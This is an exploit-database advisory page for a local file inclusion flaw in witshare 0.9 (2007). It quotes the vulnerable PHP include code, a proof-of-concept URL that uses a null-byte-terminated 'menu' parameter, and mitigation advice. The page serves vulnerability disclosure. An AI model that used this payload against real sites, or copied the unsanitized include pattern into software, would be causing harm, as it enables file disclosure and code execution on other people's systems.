header-logo
Suggest Exploit
vendor:
witshare
by:
the_Edit0r
7.5
CVSS
HIGH
Local File Include
22
CWE
Product Name: witshare
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

witshare 0.9 Local File Include Vulnerabilitiy

The witshare 0.9 software is vulnerable to Local File Include. An attacker can exploit this vulnerability by providing a malicious file name in the 'menu' parameter of the index.php file. This can lead to arbitrary file inclusion and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, the developer should validate and sanitize user input before using it in file inclusion functions. The use of a white-list approach is recommended to only allow specific files to be included.
Source

Exploit-DB raw data:

"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
   Xmor$ Security Vulnerability Research TM

# Tilte:  witshare 0.9 Local File Include Vulnerabilitiy

# Author..................: [the_Edit0r]
# HomePage ...............: [Www.XmorS-sEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [witshare]
# Site Script ............: [http://sourceforge.net/projects/witshare/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T ,DarkAngel ]
 

------------------------------------- Codes --------------------------------

<?php
  if (isset($_GET['menu'])) {
    include('pagelets/'.$_GET['menu'].'.inc');}
  else {
    include('pagelets/about.inc');}
 ?>
------------------------------- proof Of Concept ---------------------------
 
 www.example.com/[path]/index.php?menu=[Local Script]%00
 

----------------------------------------------------------------------------
 
 
# Contact me : the_3dit0r[at]Yahoo[dot]coM
# [XmorS-SEcurity.coM]

# milw0rm.com [2007-04-08]

Navigation

Suggest Exploit

Services By CQR